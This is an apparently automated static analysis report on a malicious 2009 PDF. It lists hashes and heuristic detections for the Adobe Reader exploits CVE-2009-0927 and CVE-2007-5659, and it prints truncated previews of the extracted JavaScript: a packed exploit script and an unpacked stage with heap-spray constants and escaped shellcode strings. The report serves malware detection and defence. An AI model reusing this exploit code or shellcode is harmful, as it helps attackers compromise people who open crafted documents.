Malicious PDF — malware analysis report

Static analysis result for SHA-256 7681b4bec9456ea1…

MALICIOUS

PDF

34.0 KB Created: 2009-11-03 17:49:58 +03:00 Authoring application: goingIts (via f079191821316f4c47d54f841995ae2c)
MD5: cba18bdd1f7e66cd6039cd2d90923db5 SHA-1: eea5d80ccb78e49bb6fd16d08747591fd506a085 SHA-256: 7681b4bec9456ea18a1f70a9fa82a3ad159e9171f5d4a2961df014f96c57ac07
284 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits known vulnerabilities in Adobe Reader, specifically CVE-2009-0927 (Collab.getIcon) and CVE-2007-5659 (Collab.collectEmailInfo). Static analysis successfully unpacked the JavaScript, revealing exploit triggers. The primary function of the script is to download and execute a secondary payload, indicating a downloader or initial access mechanism.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9989

Heuristics 7

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0020_000.js
6feb9c083d17fddd4ecf50b4e049aacb54dc9251dd9ebda5fd0e5b79240eca98		 pdf-javascript-stream PDF /JS object 20 at offset 0x35A3 19558 bytes
Preview script
First 1,000 lines of the extracted script
�� e v a l ( f u n c t i o n ( p , a , c , k , e , d ) { e = f u n c t i o n ( c ) { r e t u r n ( c < a ? ' ' : e ( p a r s e I n t ( c / a ) ) ) + ( ( c = c % a ) > 3 5 ? S t r i n g . f r o m C h a r C o d e ( c + 2 9 ) : c . t o S t r i n g ( 3 6 ) ) } ; i f ( ! ' ' . r e p l a c e ( / ^ / , S t r i n g ) ) { w h i l e ( c - - ) { d [ e ( c ) ] = k [ c ] | | e ( c ) } k = [ f u n c t i o n ( e ) { r e t u r n   d [ e ] } ] ; e = f u n c t i o n ( ) { r e t u r n ' \ \ w + ' } ; c = 1 } ; w h i l e ( c - - ) { i f ( k [ c ] ) { p = p . r e p l a c e ( n e w   R e g E x p ( ' \ \ b ' + e ( c ) + ' \ \ b ' , ' g ' ) , k [ c ] ) } } r e t u r n   p } ( ' g   2 p = R   M ( ) ; g   1 n ; 1 u   2 o ( i , I ) { 1 r ( i . X * 2 < I ) { i + = i } i = i . 4 b ( 0 , I / 2 ) ; 4 9   i } 1 u   Z ( 1 2 ) { v ( 1 2 = = 0 ) { g   T = 1 U ; g   z = R   M ( " % 1 N " , " % 1 S % k " , " 1 t % 3 W " , " 0 % 1 Z " , " 8 3 % 3 Z " , " 7 % L " , " d 3 % h " , " O % 4 6 " , " b 9 % 4 t " , " 1 % 1 M % k " , " 5 0 % 3 P " , " 1 a % 1 Q " , " 9 % 2 U " , " % 2 R " , " f % 2 S % " , " 2 Z % u " , " 3 7 % L " , " d 3 % 3 5 " , " a f % 2 f " , " % 3 1 " , " % 3 2 " , " 3 % 2 Q " , " % 2 P " , " b % 2 D " , " c % 2 f " , " % 2 C % u " , " 2 N % 1 g " , " 5 c % 3 H " , " f % 3 m % " , " n % " , " 1 y % r " , " 3 j % m % " , " 1 J % 3 g " , " 4 2 % 1 O " , " 2 % 2 m " , " 7 % 3 i % u " , " 1 l % u " , " 3 v % 3 w " , " % 7 c % " , " 1 x " , " % 2 3 % " , " 6 T % L " , " d 2 % 2 m " , " 7 % 6 D % h " , " 6 K % t " , " 7 G % 7 F " , " f % n % u " , " 7 C % 1 e " , " 7 A % u " , " 1 l % u " , " 7 m % 7 h " , " b % 1 B % " , " m % 7 q " , " e % 5 L % " , " n " , " % 2 c % r " , " 5 J % 1 s " , " V % 5 v " , " % 5 j % 5 a " , " 1 3 % 5 f % " , " 5 t % " , " 5 q % 6 h " , " 6 % 6 w " , " d 3 % 5 Y % " , " 5 W % " , " 6 0 % h " , " 6 6 % n % " , " 6 2 % 1 A " , " 9 % 6 3 " , " 2 8 % 7 1 " , " c c % m % " , " 6 4 % " , " 1 y % " , " 1 B " , " % m " , " % 1 J % 6 7 " , " 4 2 % 6 b % u " , " 6 a % B " , " 6 8 % 6 1 " , " % 5 U % 5 T " , " 6 c % 5 S " , " 0 % 5 R % " , " 5 V % 5 Z " , " b 6 % 5 X " , " 6 % 6 d % " , " 6 e " , " % 6 r % 1 m " , " 6 q % 6 p " , " a % 6 s " , " b f % w " , " 6 t % r " , " 6 v % 1 w " , " b f % 6 u % u " , " 6 o % 6 n " , " % 6 g % u " , " 6 f % " , " 6 i % u " , " 6 j % " , " 6 m % " , " 6 l % u " , " 6 k % 5 Q " , " 5 P % 5 p % u " , " 5 o % " , " 5 n % 5 r " , " a 6 % 5 u % u " , " 5 s % 5 m " , " 5 l % 5 b % u " , " 5 9 % u " , " 5 g % h " , " 5 h % 5 k " , " % m % r " , " 1 5 % m % " , " n % h " , " O % r " , " 1 5 % 2 7 " , " 7 % 5 i % " , " 1 x " , " % 5 w % 1 w " , " b 2 % 5 I " , " 3 % 5 H % 1 j " , " 5 K % 5 O " , " % 5 N % h " , " 5 M % 1 j " , " 5 G % 5 F " , " a 3 % 5 z " , " 6 % 5 y " , " % 5 x % 5 A " , " b f % 5 B " , " % 5 E % u " , " 5 D % 5 C " , " % 6 x % w " , " 6 y % r " , " Y % u " , " 7 t % 7 s " , " % 7 r " , " f % 7 u % u " , " 7 v % 1 z " , " a 1 % 7 y " , " % 7 x % " , " 7 w % 1 A " , " f % 7 p % E " , " 7 j % w " , " 7 i % 1 z " , " b d % s " , " 7 k % 7 l " , " 7 % 7 o " , " 8 % 7 n " , " % 7 z " , " % 2 3 % u " , " 7 N % " , " 2 6 % 7 M " , " 7 % 7 L " , " % 7 O % " , " 7 P % 7 S " , " a % 7 R " , " 0 % 2 c % u " , " 1 X % m " , " % 7 K " , " % 7 J " , " % 7 D % u " , " 7 B % 7 E " , " a 6 % 1 Z " , " 7 I % 7 H % u " , " 7 g % k " , " 7 f % 6 M " , " 4 % n " , " % 6 L " , " c % 6 N " , " d 2 % h " , " O % 6 O % " , " 6 R % 6 Q " , " 3 % 6 P % w " , " 6 J % p " , " 6 I % G " , " 6 C % u " , " 6 B % 6 A " , " 5 % 6 z % " , " 2 6 % 6 E " , " V % w " , " 6 H % u " , " 6 G % 6 F " , " % 6 S % t " , " 7 9 % 7 8 " , " 5 e % 7 7 " , " 0 % 7 a % u " , " 7 b % 1 j " , " 7 e % r " , " 7 d % 2 7 " , " 7 % 1 G " , " 7 6 % 7 4 " , " c % 6 W " , " 0 % 6 V % u " , " 1 X % h " , " O % 6 U % " , " 6 X % 6 Y " , " a % 1 s " , " V % 5 8 % " , " 7 0 % " , " n % 6 Z " , " c % 7 T % u " , " 1 l % w " , " 1 5 % 3 q " , " 8 % 3 t " , " 6 % 3 u " , " % n % " , " m % L " , " d 3 % m % " , " n % 1 s " , " V % 1 O " , " 3 % m " ) } 1 k   v ( 1 2 = = 1 ) { g   T = 3 k ; g   z = R   M ( " % 1 N % u " , " 3 x % k " , " 1 t % u " ,
... (truncated)
stream_005_off000035a3.js
4c6154aa5d472434de2b8019f51905bf3bc8a10cab0c59e4f119075e60b2985c		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x35A3 9778 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
dean_edwards_stage_000.js
cb9b36aadf3fcb5a91cc30fe57b690cd5033117e97c216d39779349c9bd27cb0		 deobfuscated-js Dean Edwards unpacked JavaScript (decompressed) at offset 0x35A3 8383 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var vg9ysD1O0=new Array();var aqfqVnLx;function bt454MEpG(hxYlO8YNp,zNvuIAcmD){while(hxYlO8YNp.length*2<zNvuIAcmD){hxYlO8YNp+=hxYlO8YNp}hxYlO8YNp=hxYlO8YNp.substring(0,zNvuIAcmD/2);return hxYlO8YNp}function bcS1QJrB3(aJvpABrgq){if(aJvpABrgq==0){var rVcRmtEm=0x0c0c0c0c;var i5nyTJor=new Array("%u9c60","%u00e8%u0","000%u5d0","0%ued","83%ub80","7%ubf","d3%u4","0d7%uf0","b9%u000","1%u3100%u0","d44%u83","1a%u04e","9%uf775","%u8e2","f%u2417%","ubad0%u","40e7%ubf","d3%u4c","af%uff58","%ucbdb","%ua3a","3%ucb7a","%ub78","b%u493","c%uff58","%ucde3%u","c393%u18","5c%u57e","f%u41f8%","ubfd3%","ud55a%ub","e86%u40d7%","u4081%u57","42%ubfd","2%ucdd","7%udf46%u","40d6%u","edd3%ubf87","%ub046%","u40d6","%u36d3%","u5f52%ubf","d2%ucdd","7%u9c46%u4","0d6%ue","dd3%uabb","f%ubfd3%u","bfd7%ua","c46%u","40d6%u","32d3%u454","b%ubef0%","u40d7%u0a5","e%u401d%","ubfd3","%ufd5a%ub","f33%u40","d7%u76e2","%uc47b%ucb","13%uc8d1%","ub4d7%","uab96%u372","6%u4b","d3%ubfb9%","u40bd%","u2a5e%u4","1f4%ubfd3%","u1785%ubfb","9%ud5","28%ube","cc%u40d7%","ubab9%","ud55a%","ubef0","%u40d7","%u4081%u5b","42%ubfd2%u","70d7%u1","113%ubda2","%u8053%u35","6c%u221","0%u83b6%","udaa1%u24","b6%ucdb","6%u3593%","ud2be","%u0eae%uc","dbc%u21b","a%u91","bf%u3","8b2%ub","fb6%u34","bf%ucfa7%u","6fed%udcfc","%u30b6%u","cbba%","u2cb6%u","8fe1%","u79e7%","udcfd%u","2db8%ud9","fc%u32b8%u","dab1%","u6fa4%ucf","a6%u21b3%u","daa7%u30","f9%ucfbb%u","29e8%u","82b7%u4","0e4%ubf68","%u40d7%ub","fd3%u40d7%","ubfd3%u4","0d7%ub","fd3%u40d","7%ub0d3%","u40d6","%uf8d3%u34","b2%ucd8","3%u23b8%ud","b92%u32b3","%uccb6%u4","0a4%ud","a94%u14","a3%ud2b","6%u10a7","%ucbb2%u01","bf%uf3d3","%u21b8%u","f3b7%u22be","%udea1%u3","9a5%ub","f92%u","2980%ufabd","%u25a","f%ubfb0%u","356c%ud3","a1%u2fba","%u91bd%","u2cb3%ubfb","f%u1282%uf","b9f%u3","7b8%ud3","bd%u2","1b8%uebb","7%u06b","8%ud3ba","%u01b2","%u36d3%u","494a%","ubfd1%ucbd","7%u8390","%u045c%","uc7d0%u345","a%ua3d","0%ufd5a%u","be2e%u40d7","%ubc62","%u417a","%u140b%u","8929%u47","a6%ued","d6%ubecc%u","40d7%u0","25e%u41f","4%ubfd3","%uf55","c%ubd","d2%u4","0d7%u455a%","ub95e%u7fe","3%u3579%u3","82e%u6","918%u8","e2a%u","ed0c%ubc8","5%u4952%","ubfd1%uc9","d7%u3","615%u","b31f%u3675","%u3416%ue","1d5%u97","5e%u549","0%u1e3f%u","5c02%ud","dd4%ub","dd6%u40d","7%u08","dc%u81c","c%ubd3","0%uddd4%u","be2e%u4","0d7%ubc58%","uc5d4%ubdd","a%u40","d7%u0254%","u41c8%","ubfd3%uc77","c%ua06e%u","40d6%u3","fd3%ufbe","8%u1ba","6%u4014","%ubfd3%","u40d7%ubf","d3%u40d7%","ubfd3%u40","d7%ubfd","3%u40d7")}else if(aJvpABrgq==1){var rVcRmtEm=0x30303030;var i5nyTJor=new Array("%u9c60%u","00e8%u0","000%u","5d00%ued8","3%ub807%","u1173%u4f","92%ue","8b9%u00","01%u3100%u","0d44%u831","a%u04e","9%uf7","75%u20","8f%u2b52","%u1470","%u4fa2%u11","73%u43ea%u","51f8%","uc49e%u0d0","3%uc43f","%u192b%u","4679%u51f","8%uc2a6%","u6d33%u17","19%uf94","f%u4eb","4%u1173%","uda1f%u","103f%","u4f92","%uee2","1%u4107%u","1172%","uc292","%u46e","6%u4f","93%u4373%","ub0c2%u","17e6%u","4f93%u98","73%u5917","%u1172","%uc292","%u0be6%u4f","93%u43","73%ua3fa","%u1173%ub0","92%u1b","e6%u4f93%","u9c73%u","4a0e%u1069","%u4f92%ua4","fe%u4","f58%u","1173%uf21","f%u11a","4%u4f92","%ud842%","ucb3e%u6","5b3%uc79","4%u1a77","%ua4d3%u99","86%u4496","%u1119","%u4ff8","%u84f","e%u4e","88%u1173%","u18c0%u11","19%uda6d","%u1065","%u4f92","%u141","9%uda","1f%u10","69%u4f","92%uee21%u","5d07%","u1172%u","7f92%ubfb3","%ub2e7%u","2ef3%u","3a29%u8cb","0%u8cf3%u","7015%u3b","f1%u7924%u","21f7%u745","d%u2a","ea%u797","3%u3b","e6%u2b0","3%u60","bd%u7010","%u26e","2%u70","07%u7d","fe%u214","3%u61ab%","u7e10%u60f","f%u7e15%u2","de0%u621","6%u3a","bd%u7","503%u3","bf3%u3f","16%u27e","2%u2e03%u2","bfb%u","254e%uf4","92%u1173%u","4f92%u117","3%u4f","92%u1","173%u4","f92%u11","73%u4","f92%u1075%","u4f92","%u7434%u","1fe6%u","7e01%u","0ef1%","u7517","%u2ae0%u62","00%u0892","%u6516%u","2ac6%u6","11e%u2ec","2%u7907","%u4fd3%","u7e3f%u2","bf3%u78","3f%u3df","0%u6312%u0","eeb%u4673%","u21fb%u69","36%u2cf7%","uaa73","%u3de7%u","7c1f%","u21fd%u755","d%u23","fe%u4","473%u03c","0%u7e37%","u21e5%u7e","1f%u2","bf3%u7e27","%u26d","4%u74
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.